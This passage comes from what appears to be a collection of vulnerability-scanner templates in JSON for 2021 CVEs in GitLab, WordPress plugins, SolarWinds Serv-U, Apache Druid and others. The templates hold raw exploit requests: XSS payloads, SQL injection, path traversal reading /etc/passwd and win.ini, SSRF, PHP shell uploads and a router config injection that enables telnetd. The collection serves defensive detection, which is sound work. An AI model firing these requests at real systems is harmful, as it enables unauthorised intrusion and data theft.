{{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22214","info":{"name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true"],"body":"{\"content\": \"include:\\n  remote: http://127.0.0.1:9100/test.yml\"}\n","headers":{"Content-Type":"application/json"},"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","part":"body","words":["does not have valid YAML syntax"]}]}]},{"id":"CVE-2021-35250","info":{"name":"SolarWinds Serv-U 15.3 - Directory Traversal","severity":"high"},"requests":[{"raw":["POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n/?Command=NOOP\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-24342","info":{"name":"WordPress JNews Theme <8.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/themes/jnews/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Change Log:","JNews -"],"condition":"and"}]},{"raw":["POST /?ajax-request=jnews HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en_US&cat_id=6\"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24347","info":{"name":"WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"cdm_upload_file_field\"\n\n{{nonce}}\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-name\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"{{randstr}}.pHP\"\nContent-Type: image/svg+xml\n\n<?php\n\necho \"CVE-2021-24347\";\n\n?>\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-notes\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"sp-cdm-community-upload\"\n\nUpload\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--\n","GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower(\"{{randstr}}.pHP\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"CVE-2021-24347\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"cdm_upload_file_field\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-20031","info":{"name":"SonicWall SonicOS 7.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{randstr}}.tld\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["https://{{randstr}}.tld/auth.html","Please be patient as you are being re-directed"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42258","info":{"name":"BillQuick Web Suite SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\n__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode(\"{{VS}}\")}}&__VIEWSTATEGENERATOR={{url_encode(\"{{VSG}}\")}}&__EVENTVALIDATION={{url_encode(\"{{EV}}\")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96\n"],"matchers":[{"type":"word","part":"body","words":["System.Data.SqlClient.SqlException","Incorrect syntax near","_ACCOUNTLOCKED"],"condition":"and"}],"extractors":[{"type":"xpath","name":"VS","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATE']"],"attribute":"value"},{"type":"xpath","name":"VSG","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"],"attribute":"value"},{"type":"xpath","name":"EV","internal":true,"xpath":["/html/body/form/div/input[@id='__EVENTVALIDATION']"],"attribute":"value"}]}]},{"id":"CVE-2021-27519","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&srch=x\"+onmouseover%3Dalert%281%29+x%3D\"&t=search&btn_submit.x=0&btn_submit.y=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["highlightSearchTerms(\"x\" onmouseover=alert(1) x=\"\");"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28377","info":{"name":"Joomla! ChronoForums 2.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24510","info":{"name":"WordPress MF Gig Calendar <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=\"></script><script>alert(document.domain)</script><\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20091","info":{"name":"Buffalo WSR-2533DHPL2 - Configuration File Injection","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","POST /images/..%2fapply_abstract.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n\naction=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/Success.htm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-33564","info":{"name":"Ruby Dragonfly <1.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==","{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36749","info":{"name":"Apache Druid - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","druid:*:1000:1000:"],"condition":"or"}]}]},{"id":"CVE-2021-25864","info":{"name":"Hue Magic 3.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43810","info":{"name":"Admidio - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please click <a href=\"javascript://%0aalert(document.domain)\" target=\"_self\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21973","info":{"name":"VMware vSphere - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1\nHost: {{Hostname}}\nVcip: {{interactsh-url}}\nVcpassword: {{rand_base(6)}}\nVcusername: {{rand_base(6)}}\nReqresource: {{rand_base(6)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The server sent HTTP status code 200"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-30497","info":{"name":"Ivanti Avalanche 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25008","info":{"name":"The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","Snippets"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27314","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Doctor Appoinment System\")"],"condition":"and"}]}]},{"id":"CVE-2021-35464","info":{"name":"ForgeRock OpenAM <7.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/oauth2/..;/ccversion/Version"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Set-Cookie: JSESSIONID="]},{"type":"word","part":"body","words":["Version Information -","openam/ccversion/Masthead.jsp"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25112","info":{"name":"WordPress WHMCS Bridge <6.4b - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<strong><img src onerror=alert(document.domain)></strong>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40973","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[lastname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46107","info":{"name":"Ligeo Archives Ligeo Basics - Server Side Request Forgery","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')","contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"]}]}]},{"id":"CVE-2021-22205","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753","1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f","14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4","1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4","20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369","2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2","33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1","335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac","34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86","3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087","340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86","38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d","3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd","39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514","39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09","3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e","3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb","40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b","45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44","473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf","5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2","69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b","7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5","73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d","77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f","78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1","93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b","9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445","bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c","d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f","dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56","def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0","eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd","ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2021-42567","info":{"name":"Apereo CAS Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cas/v1/tickets/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img/src/onerror=alert(document.domain)>","java.util.HashMap"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-27330","info":{"name":"Triconsole Datepicker Calendar <3.77 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/calendar/calendar_form.php/\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>TriConsole.com - PHP Calendar Date Picker</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42667","info":{"name":"Online Event Booking and Reservation System 2.3.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27316","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-34370","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-30151","info":{"name":"Sidekiq <=6.2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"email\":\"{{username}}\",\"password\":\"{{password}}\"}\n","GET /queues/\"onmouseover=\"alert(document.domain)\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=\"alert(document.domain)","sidekiq"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25299","info":{"name":"Nagios XI 5.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n","GET /nagiosxi/admin/sshterm.php?url=javascript:alert(document.domain) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"iframe src=\\\"javascript:alert(document.domain)\") && contains(body_3, \"SSH Terminal\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=\"nsp\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-39211","info":{"name":"GLPI 9.2/<9.5.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/telemetry.php","{{BaseURL}}/glpi/ajax/telemetry.php"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"uuid\":","\"glpi\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27124","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /patient/search_result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nexpertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","Doctor Appoinment System"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3110","info":{"name":"PrestaShop 1.7.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2021-40870","info":{"name":"Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /v1/backend1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n","GET /v1/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46424","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","severity":"critical"},"requests":[{"raw":["GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","DELETE /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 